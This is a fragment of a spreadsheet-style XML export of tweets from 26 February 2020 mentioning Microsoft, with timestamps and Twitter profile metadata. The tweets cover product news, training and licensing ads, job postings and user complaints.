    <t>#Microsoft Defender ATP for Linux is coming! ...And a sneak peek into whats next https://t.co/4WkmGbCQ4s #Defender #ATP #Linux #Security #Cloud #SecOps https://t.co/HMyhqcFHNp</t>
  </si>
  <si>
    <t>Wed Feb 26 06:34:38 +0000 2020</t>
  </si>
  <si>
    <t>#KPMG combines #CyberSecurity, #data management and industry experience with #Microsofts technology to help clients improve their business protection. 
https://t.co/0HT0929rr1</t>
  </si>
  <si>
    <t>Wed Feb 26 06:30:00 +0000 2020</t>
  </si>
  <si>
    <t>We are running a 2 day #Microsoft #Excel #Programming #VBA Course on the 16/17th April for 170.
This course is aimed at users of Excel and will teach you how to automate sheet operations in macros. For further information  email us at businessdevelopment@yorkcollege.ac.uk https://t.co/pNgQAR5mrT</t>
  </si>
  <si>
    <t>{'id': 435956930, 'id_str': '435956930', 'name': 'Business Development', 'screen_name': 'York_Col_BDU', 'location': 'York, England', 'description': 'The BDU is the commercial arm of York College linking local employers to many educational &amp; business opportunities here at the College. 01904 770368 Option 1', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2845, 'friends_count': 1892, 'listed_count': 58, 'created_at': 'Tue Dec 13 16:40:27 +0000 2011', 'favourites_count': 411, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5499, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '4B0C62', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme10/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme10/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1121440255280844800/1iIi9y5j_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1121440255280844800/1iIi9y5j_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/435956930/1556207168', 'profile_link_color': 'FAB81E', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'EFFFE0', 'profile_text_color': '525252', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Feb 26 06:20:18 +0000 2020</t>
  </si>
  <si>
    <t>Tech should build inclusivity, trust, and sustainability: Microsoft CEO @satyanadella
 #FutureDecoded #Microsoft
https://t.co/nMnmRQCkhQ</t>
  </si>
  <si>
    <t>{'id': 937962626222497793, 'id_str': '937962626222497793', 'name': 'Devdiscourse', 'screen_name': 'dev_discourse', 'location': 'National Capital Region', 'description': "Devdiscourse: World's leading Website for International Development News, Opinions, Interviews and Breaking News.", 'url': 'https://t.co/CELXEGzKqt', 'entities': {'url': {'urls': [{'url': 'https://t.co/CELXEGzKqt', 'expanded_url': 'https://www.devdiscourse.com', 'display_url': 'devdiscourse.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 79874, 'friends_count': 679, 'listed_count': 63, 'created_at': 'Tue Dec 05 08:31:31 +0000 2017', 'favourites_count': 914, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 276052,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'http://pbs.twimg.com/profile_images/994485257327046656/8DSy51HP_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/994485257327046656/8DSy51HP_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/937962626222497793/1573131283',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</si>
  <si>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06:19:46 +0000 2020</t>
  </si>
  <si>
    <t>Office 365  Your complete office on the cloud
Know Office 365 offerings/services and let Logix own the complete customer lifecycle through direct billing, provisioning, management, and support of Office 365.
https://t.co/3KU2Xy1BAv
#Microsoft #Office365 https://t.co/e0mqPIZSFS</t>
  </si>
  <si>
    <t>{'id': 222368155, 'id_str': '222368155', 'name': 'Logix InfoSecurity', 'screen_name': 'logixInfo', 'location': 'Mumbai', 'description': 'Area of Expertise - Email Security | Enterprise Mailing &amp; Collaboration | Cyber Security. Recognized as #Microsoft #Googleapps #Zimbra Cloud Solution Provider', 'url': 'https://t.co/f0NHeZeT7g', 'entities': {'url': {'urls': [{'url': 'https://t.co/f0NHeZeT7g', 'expanded_url': 'http://www.logix.in', 'display_url': 'logix.in', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 624, 'friends_count': 887, 'listed_count': 53, 'created_at': 'Fri Dec 03 06:11:05 +0000 2010', 'favourites_count': 6, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1422,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'http://pbs.twimg.com/profile_images/1181400064/logix-logo_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1181400064/logix-logo_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/222368155/1579242329', 'profile_link_color': '082584',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</si>
  <si>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Wed Feb 26 06:19:23 +0000 2020</t>
  </si>
  <si>
    <t>7 Most Unsuccessful IT Mergers
Read full article: https://t.co/rliSehnqDs
#distilnfo #itnews #technology #merger #microsoft #yahoo #broadcast #skype #ebay #microsoft #nokia #yahoo #tumblr #google #motorola #hp #compaq #zynga #omgpop https://t.co/3bMilwIuH0</t>
  </si>
  <si>
    <t>Wed Feb 26 06:18:43 +0000 2020</t>
  </si>
  <si>
    <t>Wed Feb 26 06:17:01 +0000 2020</t>
  </si>
  <si>
    <t>Blue Monday for Bigh Tech [infographic] #GAFA #microsoft #facebook #amazon #google #apple https://t.co/yQHB6nPnuJ</t>
  </si>
  <si>
    <t>{'id': 24206297, 'id_str': '24206297', 'name': 'Svein FrÃ¸ystad', 'screen_name': 'sveinfr', 'location': 'Norway', 'description': 'Ã…lesunder! Opptatt av ledelse, teknologi og sparing- tweetene er preget av at jeg jobber innen Finans | Mastergrad i Informatikk og ledelse fra UIO', 'url': 'https://t.co/XU2ep4ptLx', 'entities': {'url': {'urls': [{'url': 'https://t.co/XU2ep4ptLx', 'expanded_url': 'https://sveinfr.blogspot.com/', 'display_url': 'sveinfr.blogspot.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2533, 'friends_count': 1875, 'listed_count': 524, 'created_at': 'Fri Mar 13 17:04:57 +0000 2009', 'favourites_count': 867, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 19398,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'http://pbs.twimg.com/profile_images/1165162931165814785/iRpN0U3G_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1165162931165814785/iRpN0U3G_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/24206297/1506506252',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</si>
  <si>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06:16:37 +0000 2020</t>
  </si>
  <si>
    <t>Azure Unblogged - Replace your file #server with a #serverless Azure #FileShare! https://t.co/vk1QK4nSKL #Microsoft #Office #Office365</t>
  </si>
  <si>
    <t>Wed Feb 26 06:14:08 +0000 2020</t>
  </si>
  <si>
    <t>Scale up to the demand while maintaining integrity, consistency, and quality at the same time with a fully integrated Dynamics 365 platform... Visit for more info: https://t.co/FiuqM99Onj
#Raybiztech #Microsoft #Dynamics365 #MicrosoftGoldPartner #MSDyn365 https://t.co/42UcfHxGEn</t>
  </si>
  <si>
    <t>Wed Feb 26 06:13:28 +0000 2020</t>
  </si>
  <si>
    <t>More than 56% of Organizations use Office 365 and it is the world's most used cloud service. Read how and why network can affect the performance of Office 365 and how you can get the most out of the application.
https://t.co/hwVudv4GLN
#Office365 #network #cloud #microsoft</t>
  </si>
  <si>
    <t>Wed Feb 26 06:08:27 +0000 2020</t>
  </si>
  <si>
    <t>A secure foundation for IoT, Azure Sphere now generally available | Azure Blog and Updates | Microsoft Azure https://t.co/v7nPQD0jCu #microsoft #iot #azure #linux #software #softwarelibre</t>
  </si>
  <si>
    <t>{'id': 3122211, 'id_str': '3122211', 'name': 'Juan JosÃ© CalderÃ³n Amador', 'screen_name': 'eraser', 'location': 'Sevilla', 'description': 'elige la cadena de la vida abc1chde2ghij...âœ˜â“”-â“â“â“¤â“£â“, â“”-â“œâ“”â“â“£â“” Sevilla â˜… blockchain â˜… elearning â˜…â’¶râ“£ â˜… P2P â˜… economyâ˜…HigherED â˜… #T5eS @elmuelledelasal', 'url': 'https://t.co/n0pfWAeYDy', 'entities': {'url': {'urls': [{'url': 'https://t.co/n0pfWAeYDy', 'expanded_url': 'https://medium.com/T5eS', 'display_url': 'medium.com/T5eS', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 25543, 'friends_count': 13062, 'listed_count': 2108, 'created_at': 'Sun Apr 01 12:12:45 +0000 2007', 'favourites_count': 6846, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 624597,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'http://pbs.twimg.com/profile_images/994702690893664262/0BxqBxIU_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/994702690893664262/0BxqBxIU_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3122211/1525990941', 'profile_link_color': 'FF691F', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'E0FF92', 'profile_text_color': '000000', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'regular'}</t>
  </si>
  <si>
    <t>Wed Feb 26 06:08:13 +0000 2020</t>
  </si>
  <si>
    <t>When providing public services, #efficiency can make or break the public's trust in your organization. Subscribe now to learn how you can enable trust-building actions with #Microsoft. https://t.co/PIipJqDuav</t>
  </si>
  <si>
    <t>Wed Feb 26 06:05:00 +0000 2020</t>
  </si>
  <si>
    <t>In few minutes, Ismail Ismail will kick off the new #HPE #Microsoft Global #Hybridcloud Summit roadshow 2020 today in Riyadh : join the conversation with #HPEMSFT #AzureArc #AzureStackHub #AzureStackHCI  #HPEGreenlake &amp;amp; access the slidedeck at  https://t.co/JuaCQWWvUF https://t.co/EPnxeT99mg</t>
  </si>
  <si>
    <t>Wed Feb 26 06:01:38 +0000 2020</t>
  </si>
  <si>
    <t>Raspberry Pi 4 vs NVIDIA Jetson Nano Developer Kit
 #RaspberryPi #RaspberryPi4 #Microsoft #MicrosoftAzure
https://t.co/93GKtYmJYA</t>
  </si>
  <si>
    <t>Wed Feb 26 06:00:08 +0000 2020</t>
  </si>
  <si>
    <t>In the event that your computer crashes or some other unecessary computer mishap, MS Word recovers your document from a supersecret safety copy it secretly made for you.
#Microsoft #Office365 #Softvire
https://t.co/GjDn9K55ki https://t.co/83oyDz7KNj</t>
  </si>
  <si>
    <t>Wed Feb 26 06:00:00 +0000 2020</t>
  </si>
  <si>
    <t>Urs Renggli talks about the Global #HPE #Microsoft #Hybridcloud Summit 2020 roadshow and shares top 3 reasons to attend the next event from 30 locations WorldWide
@Microsoft_Saudi @AljishiMaram #Social4UTV #HPEMSFT #mpgvip #AzurestackHub #AzurestackHCI @Ghand_Mo @Othman_Albadr https://t.co/uakUoEJc1O</t>
  </si>
  <si>
    <t>Wed Feb 26 05:55:02 +0000 2020</t>
  </si>
  <si>
    <t>Nog meer #MicrosoftTeams voordelen! Integratie met #Microsoft #PowerBI (The roll out of the new Power BI tab has started and should complete by 2/28/2020).
https://t.co/QXvOFXQguz via @MSPowerBI #Office365 #Microsoft365 https://t.co/gA0FaOons4</t>
  </si>
  <si>
    <t>Wed Feb 26 05:51:46 +0000 2020</t>
  </si>
  <si>
    <t>98 of the Fortune 100 companies use @SQLServer. If you're not, maybe it's time you revisit your data platform. Take advantage of the efficiency and agility of the cloud to scale your data with ease. #Microsoft #Azure https://t.co/pK80kyK3Gu</t>
  </si>
  <si>
    <t>Wed Feb 26 05:50:49 +0000 2020</t>
  </si>
  <si>
    <t>Wed Feb 26 05:46:03 +0000 2020</t>
  </si>
  <si>
    <t>Hope India Continues To Be A Progressive Democracy, Says Nadella https://t.co/n3Rpw2ffO4 #news #microsoft</t>
  </si>
  <si>
    <t>Wed Feb 26 05:43:15 +0000 2020</t>
  </si>
  <si>
    <t>Why #Azure Sphere From #Microsoft Is A Big Deal For The #IoT Ecosystem https://t.co/8Bwjp6qVtu #MSDevIRL</t>
  </si>
  <si>
    <t>{'id': 15567647, 'id_str': '15567647', 'name': 'Juarez Junior', 'screen_name': 'juarezjunior', 'location': 'Ireland', 'description': '@Azure Developer Relations Lead @Microsoft @MSdevIRL | #Blockchain #Java ðŸ¥‘ Invite me to speak about #Azure #Blockchain #Java #EmergingTechnologies', 'url': 'https://t.co/yVhxauDFZK', 'entities': {'url': {'urls': [{'url': 'https://t.co/yVhxauDFZK', 'expanded_url': 'https://www.linkedin.com/in/jujunior', 'display_url': 'linkedin.com/in/jujunior', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2862, 'friends_count': 4966, 'listed_count': 766, 'created_at': 'Wed Jul 23 17:25:11 +0000 2008', 'favourites_count': 11132, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 19581,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'http://pbs.twimg.com/profile_images/1066318177188147201/Z6TU0sRx_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1066318177188147201/Z6TU0sRx_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/15567647/1488057416',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</si>
  <si>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05:41:39 +0000 2020</t>
  </si>
  <si>
    <t>Under the #Microsoft for Startups programme, the company is providing the #startups with joint sales opportunities.
https://t.co/L8U2V0ADxR</t>
  </si>
  <si>
    <t>{'id': 605783487, 'id_str': '605783487', 'name': 'Inc42', 'screen_name': 'Inc42', 'location': 'Delhi, India', 'description': 'Inc42 is a leading Indian media and information platform, known for its end-to-end coverage of the Indian startup ecosystem.', 'url': 'https://t.co/isXr4rrJx4', 'entities': {'url': {'urls': [{'url': 'https://t.co/isXr4rrJx4', 'expanded_url': 'http://inc42.com', 'display_url': 'inc42.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 22452, 'friends_count': 444, 'listed_count': 1237, 'created_at': 'Mon Jun 11 19:58:31 +0000 2012', 'favourites_count': 8176, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 97832, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'D8D8D8', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1027479034416877568/lTfYZwfF_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1027479034416877568/lTfYZwfF_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/605783487/1582546985', 'profile_link_color': 'F42535', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'EFEFEF', 'profile_text_color': '333333', 'profile_use_background_image': False, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Feb 26 05:39:34 +0000 2020</t>
  </si>
  <si>
    <t>#Facebookbot is very easy to find. It is visible to around 1.3 billion users of #Facebook. 
https://t.co/Nezy7oTOZW
#botframework #chatbots #aiforeveryone #aiforall #botcomposer #msdevbuild #msbot #microsoftai #bot #customerfeedback #automate #feedback #ai #microsoft  #azureai https://t.co/WPxEgbZiuD</t>
  </si>
  <si>
    <t>{'id': 150565049, 'id_str': '150565049', 'name': 'Suthahar', 'screen_name': 'jssuthahar', 'location': 'Bangalore', 'description': '#MicrosoftAI, #Azure, #Xamarin, #AI #Cognitive, #Bot Development Solutions Architect', 'url': 'https://t.co/oSqbD5dSFn', 'entities': {'url': {'urls': [{'url': 'https://t.co/oSqbD5dSFn', 'expanded_url': 'http://www.msdevbuild.com', 'display_url': 'msdevbuild.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 253, 'friends_count': 460, 'listed_count': 5, 'created_at': 'Tue Jun 01 07:23:03 +0000 2010', 'favourites_count': 418, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 788,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'http://pbs.twimg.com/profile_images/1056238601510576128/yA_srYHB_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1056238601510576128/yA_srYHB_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/150565049/1580841756',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</si>
  <si>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05:37:02 +0000 2020</t>
  </si>
  <si>
    <t>On the big screen! #LearningLab #Microsoft #lovemyjob https://t.co/tWPV1Qi0uK</t>
  </si>
  <si>
    <t>{'id': 172290215, 'id_str': '172290215', 'name': 'Noelene Callaghan', 'screen_name': 'ncallaghan1', 'location': 'Sydney, Australia', 'description': 'Digital Classroom Officer K-12, Foundations.T4L - Tech Pedagogy - Microsoft Innovative Expert - Google Certified - Global Minecraft Mentor', 'url': 'https://t.co/vpPpurbsuy', 'entities': {'url': {'urls': [{'url': 'https://t.co/vpPpurbsuy', 'expanded_url': 'http://www.noelenecallaghan.com', 'display_url': 'noelenecallaghan.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2391, 'friends_count': 1772, 'listed_count': 250, 'created_at': 'Thu Jul 29 10:17:53 +0000 2010', 'favourites_count': 7553, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 14645,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'http://pbs.twimg.com/profile_images/1227127179986653184/fJORYWXv_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1227127179986653184/fJORYWXv_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/172290215/1580354471', 'profile_link_color': '0084B4',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</si>
  <si>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05:29:03 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft bad windows performance and store and setting and edge can't work correctly and bad response and down right now and bad so much</t>
  </si>
  <si>
    <t>Wed Feb 26 05:29:01 +0000 2020</t>
  </si>
  <si>
    <t>To be honest, I have no interest in getting an Xbox Series X when it's released later this year. I already have a gaming PC that will run the same games that'll be released on the console. #XboxSeriesX #Xbox #Microsoft #opinions #gaming</t>
  </si>
  <si>
    <t>{'id': 947008244492505088, 'id_str': '947008244492505088', 'name': 'FLOOFY | AngelStepStyle #WorldTourHype', 'screen_name': 'AngelStep123', 'location': 'Old Forge, PA', 'description': 'Self-Taught Artist &amp; Gamer Girl. Huge Sophitia and Cassandra fangirl. #SOULCALIBURVI S2 Hype! (^0^)/', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 832, 'friends_count': 508, 'listed_count': 7, 'created_at': 'Sat Dec 30 07:35:34 +0000 2017', 'favourites_count': 189979, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 109157,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'http://pbs.twimg.com/profile_images/1233935861974290432/aRUC5Ysy_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1233935861974290432/aRUC5Ysy_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/947008244492505088/1565078279',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</si>
  <si>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05:27:02 +0000 2020</t>
  </si>
  <si>
    <t>++ a great summary of @Lumia history ++ the flagships of #Microsoft have been great (if you set up them well) https://t.co/egwsObGrQ9</t>
  </si>
  <si>
    <t>{'id': 798587846110150656, 'id_str': '798587846110150656', 'name': 'Windows Mobile Fans', 'screen_name': 'IHS_WinMobile', 'location': 'Worldwide', 'description': '+ #Microsoft @Lumia Fans Worldwide ++ #sports  ++ the competitive @Lumia line ++', 'url': 'https://t.co/lz4kAx6rkq', 'entities': {'url': {'urls': [{'url': 'https://t.co/lz4kAx6rkq', 'expanded_url': 'https://support.microsoft.com/en-us/help/13296/mobile-devices-pdf-user-guides', 'display_url': 'support.microsoft.com/en-us/help/132â€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 75, 'friends_count': 235, 'listed_count': 1, 'created_at': 'Tue Nov 15 18:05:54 +0000 2016', 'favourites_count': 185, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1061047784386768896/0ci9T05D_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1061047784386768896/0ci9T05D_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/798587846110150656/1543628596',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</si>
  <si>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Wed Feb 26 05:25:24 +0000 2020</t>
  </si>
  <si>
    <t>#Accounts #Executive #Job #vacancies in #Bahadurgarh
Maintaining financial records
Handling accounts payable receivable
Handling queries related to #accounts
GST Calculation &amp;amp; Filing Knowledge Must,
Should be proficient with #Tally, #Microsoft #office
https://t.co/WyjAJ8JImu</t>
  </si>
  <si>
    <t>Wed Feb 26 05:20:09 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft edge and store and windows can't update and crash and edge can't restart and have issues it's not response right now and slow down</t>
  </si>
  <si>
    <t>Wed Feb 26 05:18:57 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft edge and store and windows can;t update and crash and edge can't restart and have issues it's not response right now and slow down</t>
  </si>
  <si>
    <t>Wed Feb 26 05:17:15 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft edge and store and windows can;t update and crash and edge can;t restart and have issues it;'s not response right now and slow down</t>
  </si>
  <si>
    <t>Wed Feb 26 05:16:25 +0000 2020</t>
  </si>
  <si>
    <t>Without a doubt, passing the #Microsoft #Azure Certification Exams is all about having the right strategy together with the right learning material. Also, if you are looking for some expert tips and tricks to crack the #AZ900 Microsoft exam, the followin... https://t.co/vnpS6HM9ia https://t.co/g7sk4fEPK9</t>
  </si>
  <si>
    <t>Wed Feb 26 05:12:14 +0000 2020</t>
  </si>
  <si>
    <t>#XboxSeriesX Backward Compatibility Has One Depressing Flaw - #GamingNews #Microsoft #OpEd - https://t.co/H4Z4Nle2DW</t>
  </si>
  <si>
    <t>Wed Feb 26 05:10:38 +0000 2020</t>
  </si>
  <si>
    <t>Multi-tenant #Citrix Apps and Desktops Service is here!  
What's more, you can integrate it with any combination of #Microsoft #WVD, #GCP, #AWS and privately hosted workloads for true hybrid DaaS.
https://t.co/ZQ18MfKqRA  
#HybridCloud #rhipeCloud #DaaS #Azure #Google #Amazon</t>
  </si>
  <si>
    <t>Wed Feb 26 05:08:06 +0000 2020</t>
  </si>
  <si>
    <t>Hands-on look at the NZXT H1, an Xbox Series X inspired Mini-ITX computer case. https://t.co/LLhIrjxkYk #xboxseriesx #microsoft #gadgets #technology #gaming #geek $MSFT https://t.co/ouwZUQfYuC</t>
  </si>
  <si>
    <t>Wed Feb 26 05:08:02 +0000 2020</t>
  </si>
  <si>
    <t>#KnockOut and #Fight #OnPremise #chains with #Microsoft #Solutions . Go #virtual with #Office365 #Dynamics365 #Microsoft365 #InTune #SCCM #Azure #ActiveDirectory all discounted 15-20% below #MSRP  . Call (888)511-0143 or Visit https://t.co/fi8EHzgF9M https://t.co/1a8j1lv6co</t>
  </si>
  <si>
    <t>Wed Feb 26 05:07:20 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Introduces Defender Antivirus for Linux, Android and #IOS in the Pipeline
#Microsoft has just announced a public preview of its #AntivirusSoftware for various #Linux distributions, including #Ubuntu, #RHEL, #CentOS and #Debian.
Read More: https://t.co/vBGnPosGuG https://t.co/hW59I8p5EE</t>
  </si>
  <si>
    <t>{'id': 431602397, 'id_str': '431602397', 'name': 'ISOEH', 'screen_name': 'isoeh', 'location': 'Kolkata, India', 'description': 'Indian School of Ethical Hacking - IT Security Audit, 27001 ISMS, Vulnerability Analysis, Penetration testing, Corporate Training (CEH, Forensic, CISSP, etc).', 'url': 'https://t.co/kOJRaFYj1w', 'entities': {'url': {'urls': [{'url': 'https://t.co/kOJRaFYj1w', 'expanded_url': 'https://www.isoeh.com', 'display_url': 'isoeh.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 844, 'friends_count': 80, 'listed_count': 30, 'created_at': 'Thu Dec 08 13:33:06 +0000 2011', 'favourites_count': 22, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3115,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'http://pbs.twimg.com/profile_images/988280692806074373/_Fir3OlF_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/988280692806074373/_Fir3OlF_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/431602397/1576229493',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</si>
  <si>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Wed Feb 26 05:06:23 +0000 2020</t>
  </si>
  <si>
    <t>Helen and team do an amazing job bringing #Microsoft Defender ATP to all platforms. I'm happy this next step is becoming public. Not just Linus server, but also mobile threat detection coming soon. #infosec #security #RSAC https://t.co/8jqVfI6ntk</t>
  </si>
  <si>
    <t>{'id': 2467038055, 'id_str': '2467038055', 'name': 'Amitai Rottem', 'screen_name': 'AmitaiTechie', 'location': 'Seattle', 'description': 'Product Manager #Microsoft Defender ATP. Software Developer. Entrepreneur. Passionate. Not-A-Bot.', 'url': 'https://t.co/zAnnTRlxzz', 'entities': {'url': {'urls': [{'url': 'https://t.co/zAnnTRlxzz', 'expanded_url': 'http://bit.ly/AboutAmitai', 'display_url': 'bit.ly/AboutAmitai', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1087, 'friends_count': 167, 'listed_count': 53, 'created_at': 'Mon Apr 28 01:25:24 +0000 2014', 'favourites_count': 294, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1579,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'http://pbs.twimg.com/profile_images/465624452084953088/BFg9-Nyx_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/465624452084953088/BFg9-Nyx_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2467038055/1510376372',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</si>
  <si>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05:05:20 +0000 2020</t>
  </si>
  <si>
    <t>A secure foundation for IoT, #Azure Sphere now generally available https://t.co/UMsfunE9M1 #cloud #microsoft</t>
  </si>
  <si>
    <t>Wed Feb 26 05:02:19 +0000 2020</t>
  </si>
  <si>
    <t>In this episode I sit down with Microsoft Service Adoption Specialist Brenton Johnson to talk about how you can drive adoption of #Office365 and other cloud technologies in your organisation.  https://t.co/f5xEkvWmuE #cloud #technology #microsoft #informationmanagement https://t.co/i2uhD6w3Bl</t>
  </si>
  <si>
    <t>{'id': 2688538622, 'id_str': '2688538622', 'name': 'Miktysh', 'screen_name': 'Miktysh', 'location': 'Brisbane, Queensland', 'description': 'Strategic information &amp; records management agency partnered with Micro Focus, RecordPoint, Objective, Microsoft, inMailX, EzeScan, OnePlaceMail, Brolly &amp; Xillio', 'url': 'http://t.co/mOB75bXTB8', 'entities': {'url': {'urls': [{'url': 'http://t.co/mOB75bXTB8', 'expanded_url': 'http://www.miktysh.com.au', 'display_url': 'miktysh.com.au', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 73, 'friends_count': 105, 'listed_count': 3, 'created_at': 'Mon Jul 28 22:51:57 +0000 2014', 'favourites_count': 288, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 368,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'http://pbs.twimg.com/profile_images/504781640472596480/2_F05cBm_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/504781640472596480/2_F05cBm_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2688538622/1455857636',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</si>
  <si>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05:00:04 +0000 2020</t>
  </si>
  <si>
    <t>#Indian retailer #Myntra.in is using #Microsoft #Azure to accelerate its digital transformation and offer an unmatched customer experience - Amar Nagaram @_MAnant #India #Retail https://t.co/h0t7zoVwE8 #MSFTAdvocate</t>
  </si>
  <si>
    <t>Wed Feb 26 04:53:43 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #VolumeLicensing #specialist for #SQLServer #WindowsServer #OfficeStandard2019 #OfficeProfessionalPlus2019 #MicrosoftProject #Visio #Windows10 #SharePoint #ExchangeServer for 15-20% #discount . Call (888)511-0143 or Visit https://t.co/fi8EHzgF9M #ItGurusAtl https://t.co/RGj0Frggtf</t>
  </si>
  <si>
    <t>Wed Feb 26 04:48:43 +0000 2020</t>
  </si>
  <si>
    <t>Looking for #Reputed #Microsoft #training provider in Los Angeles, Explore in details about courses in Microsoft - https://t.co/YbSSvYXNxb  Call us at:  310-216-3067 for any inquiry https://t.co/c14GUv2vtA</t>
  </si>
  <si>
    <t>Wed Feb 26 04:42:00 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #Edge will soon warn you if you visit phishing website https://t.co/aO9ZU2yPPu</t>
  </si>
  <si>
    <t>Wed Feb 26 04:40:58 +0000 2020</t>
  </si>
  <si>
    <t>Any female frontend engineers or engineering leaders out there interested in an exciting role building cybersecurity user experiences on an awesome team at #Microsoft? Please share for reach, DM me w any questions!  https://t.co/rHHwmbMrvC</t>
  </si>
  <si>
